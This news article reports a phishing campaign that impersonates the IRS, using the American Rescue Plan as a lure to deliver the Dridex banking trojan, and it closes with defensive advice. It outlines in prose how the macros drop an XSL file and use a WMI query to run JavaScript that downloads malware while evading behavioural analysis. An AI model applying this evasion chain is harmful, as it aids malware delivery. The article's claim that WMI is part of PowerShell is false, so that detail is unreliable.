The American Rescue Act is the newest lure being circulated in an e-mail campaign.
Cyber-criminals are taking advantage of the American Rescue Plan – the COVID-19 relief legislation just signed into US law – as a lure for email-based scams.
According to researchers at Cofense, a campaign began circulating in March that relied on Americans’ interest in the new $1,400 relief payments & other aid.
US Internal Revenue Service
The emails impersonate the IRS (US Internal Revenue Service), using the agency’s official logo & a spoofed sender domain of IRS[.]gov & claim to offer an application for financial assistance. However, the emails offer the Dridex banking trojan.
The email states, “It is possible to get aid from the Federal Govt. of your choice” & then offers “quotes” for a pie-in-the-sky litany of great (& non-existent) things – such as a $4,000 check, the ability to “skip the queue for vaccination” & free food.
There is a button that states, “Get apply form” – if clicked, users are taken to a Dropbox account where they see an Excel document that says, “Fill this form below to accept Federal State Aid.”
To see this supposed IRS form fully, victims are prompted to enable content. When they do, they launch macros that set off the infection chain indirectly, observed Cofense.
Static Analysis
“While static analysis easily identifies the URLs used to download malware in this case, automated behavioural analysis may have trouble recognising the activity as malicious because it does not use macros to directly download malware or run a PowerShell script,” Cofense researchers explained on Tues.
“The macros used by the .XLSM files drop an .XSL file to disk, & then use a Windows Management Instrumentation (WMI) query to gather system information.”
Power Shell
WMI is a sub-system of Power Shell that gives admins access to system monitoring tools, including the ability to ask for information about anything that exists on a given computer – such as which files & applications are present. It can also request responses to these queries to be given in a certain format.
“The WMI query employed in this case…demands that the dropped .XSL file be used to format the response to the query,” researchers wrote.
“This formatting directive allows JavaScript contained in the .XSL file to be executed via WMI & download malware, avoiding the more commonly seen methods via PowerShell.”
What is Dridex?
Since 1st 2011 appearance, the Dridex malware (a.k.a. Bugat & Cridex) has been used via phishing emails & generally targets banking information. After capturing banking credentials, it endeavours to make unauthorised electronic funds transfers from unwary victims’ bank accounts.
By 2015, the malware was one of the most prevalent financial trojans out there, particularly when it came to targeting corporate employees; whilst later versions of the malware were designed with the extra function of assisting in the installation of ransomware. It has also improved its obfuscation capabilities over time.
Russian-Speaking
In Dec. 2019, authorities cracked down on Russian-speaking cyber-crime group Evil Corp. with sanctions & charges against its leader, Maksim Yakubets, known for his lavish lifestyle.
US authorities are still offering up to $5m for information leading to his arrest; they allege that Yakubets & Evil Corp. have stolen millions of $s from victims using the Dridex banking trojan & Zeus malware.
The Phish
This latest campaign is very convincing, researchers observed – but only to a certain extent. One technique the attackers use is that the email domain is lRS[.]gov – but with a lower-case ‘L’ rather than an upper-case ‘I.’
However, phrasing like “Federal State Aid” (Federal & State Aid are different) & bad grammar such as “the federal government of your choice” should set off alarm bells.
“A close examination of the email shows a few suspicious characteristics,” according to Cofense. “The phrasing within the document, while not clearly as bad as something auto-translated from another language, still has some mistakes that are not expected from what purports to be a govt. communication.”
Phishing-Recognition Skills
They added, “Despite those issues, this campaign is likely to entice the average user who’s in a hurry to learn more about the rescue plan.”
To avoid being a victim, users should improve their phishing-recognition skills, e.g., checking for slight differences between real & spoofed domains. For businesses, “as a general rule, WMI & PowerShell should be carefully monitored on most work-stations,” Cofense recommended.
https://www.cybernewsgroup.co.uk/virtual-conference-april-2021/
